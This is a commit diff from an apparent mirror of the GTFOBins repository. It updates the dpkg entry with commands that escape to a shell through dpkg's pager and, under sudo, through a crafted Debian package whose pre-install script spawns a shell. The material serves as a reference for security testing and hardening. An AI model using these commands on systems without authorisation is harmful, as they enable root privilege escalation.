mirror of
				https://github.com/GTFOBins/GTFOBins.github.io
				synced 2025-11-04 02:38:43 +01:00 
			
		
		
		
	Improve dpkg
This commit is contained in:
		@@ -1,6 +1,15 @@
 | 
			
		||||
---
 | 
			
		||||
functions:
 | 
			
		||||
  shell:
 | 
			
		||||
    - description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
 | 
			
		||||
      code: |
 | 
			
		||||
        dpkg -l
 | 
			
		||||
        !/bin/sh
 | 
			
		||||
  sudo:
 | 
			
		||||
    - description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
 | 
			
		||||
      code: |
 | 
			
		||||
        sudo dpkg -l
 | 
			
		||||
        !/bin/sh
 | 
			
		||||
    - description: |
 | 
			
		||||
        It runs an interactive shell using a specially crafted Debian package. Generate it with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.
 | 
			
		||||
        ```
 | 
			
		||||
@@ -9,8 +18,4 @@ functions:
 | 
			
		||||
        fpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TF
 | 
			
		||||
        ```
 | 
			
		||||
      code: sudo dpkg -i x_1.0_all.deb
 | 
			
		||||
  shell:
 | 
			
		||||
    - code: |
 | 
			
		||||
        dpkg -l
 | 
			
		||||
        !/bin/sh    
 | 
			
		||||
---
 | 
			
		||||
 
 | 
			
		||||
		Reference in New Issue
	
	Block a user